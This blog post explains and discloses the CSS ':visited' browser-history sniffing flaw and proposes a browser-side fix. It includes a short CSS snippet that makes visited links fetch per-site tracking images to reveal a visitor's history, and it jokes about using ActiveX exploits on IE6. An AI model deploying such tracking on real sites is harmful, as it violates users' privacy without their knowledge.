Remotely Viewing A User’s Web History With CSS

Throughout the years, there have been several JavaScript/CSS/VBScript exploits in various browsers (and by “various”, I mean mostly Internet Explorer) that allow a remote site to view a user’s complete web history.

There is a technique, however, for easily recording a user’s browsing history without relying on a remote code execution exploit, and the only requirement is a fairly W3C CSS-compliant browser. That’s right – even JavaScript-disabled visitors can still have their browsing histories compromised with this technique.

The Disclaimer

This code is provided as an example of a flaw which spans several web browsers, but is not meant to be implemented on an actual functional web site outside of the purpose of demonstration (as we provide below). Production usage of this code is considered a violation of privacy from both the standpoint of the end-user(s) and law enforcement in some regions.

In a nutshell: This is an example of a flaw, don’t actually use this.

The Standard

W3C CSS standards state that if a hyperlink has been visited and there is an ‘a:visited’ pseudo-class CSS definition for said link, then to format the link according to the CSS statements within the ‘a:visited’ definition.

So, by adding something like the following (demonstration-only; see above) code, you can detect what sites or pages a user has been to, granted you know what you are looking for:


/* Hidden so the user doesn't see them */
a {visibility:hidden;} /* alternatively, background-image:url('/not.png'); etc. */
a.slashdot:visited{background-image:url('/v.png?site=slashdot');visibility:hidden;}
a.digg:visited{background-image:url('/v.png?site=digg');visibility:hidden;}

And the HTML:

.
.

The above code uses the CSS standard as an exploit to determine whether the user has visited Slashdot.org or Digg.com. The same code can be applied to any site you wish to detect, and so far works in all pseudo-class supporting browsers.

This excludes Internet Explorer 6, but there are other ActiveX exploits you can use for that instead :D

However, the code also requires some crafty PHP code for recording the information on the server via the request for the ‘v.png’ file:

The Hack

The ‘v.png’ file used above is the receiver of the visit detection. It is actually named ‘v.png.php’ on an Apache/IIS server that supports leaving off the file extension of a script name (the ‘+MultiViews’ option in Apache).

The code for ‘v.png.php’ would ideally look something like this:



There is an example of this page found here, only it doesn’t actually record any of the example links you’ve followed. PHP source code is found at the .txt symbolic link here for v.png.php.

The Fix

Browser authors can patch this up by disallowing cross-site CSS link checking. For example, if ebay.com is checking for visited links to ebay.com, then fine. But if ebay.com is checking for links to google.com, then don’t render the CSS code violating the security measure.

Sub-domains are acceptable, as some sites either use massive server farms (e.g. s1.ibm.com) or other scenarios.

All of these options should be optionally overridden in the same fashion as the about:config file in Mozilla Firefox, as some users may need to debug this functionality after accidentally violating this in their own site.

The Verdict

Will it allow shellcode to enter your computer and fire up a VNC server for remote control? No.

Will it violate your privacy on a per-site basis? Absolutely.

So while not a “code-red” exploit, it is still serious enough to be considered a major bug in both the CSS standard’s oversight and in the way most browsers blindly implement the standard. Nothing in the W3C papers states against the methods for solving this issue outlined here, and it would benefit users greatly.

An ad within an iframe HTML element could easily use this to target advertisements based on the user’s previous browsing history, especially if using the hidden CSS attribute and outputting the ad on the fly per-request.

Whatever the scenario, this needs to be fixed and promptly. While not a major exploit, it is one serious enough to be considered a major invasion of privacy for users.

(Thanks to editor-in-chief Anthony for both pointing this out to me initially and providing the example code. I’m a researcher, not a security expert A.K.A hacker)

Stephen

Stephen (last name kept private) is currently a student at the University of South Carolina with a major in computer science. He is very knowledgeable when it comes to current as well as up-and-coming software technologies, and is renown for his intuitive reviews of software products and services.

More Posts

There are no comments yet, add one below.

Leave a Comment

Your email address will not be published. Required fields are marked *

*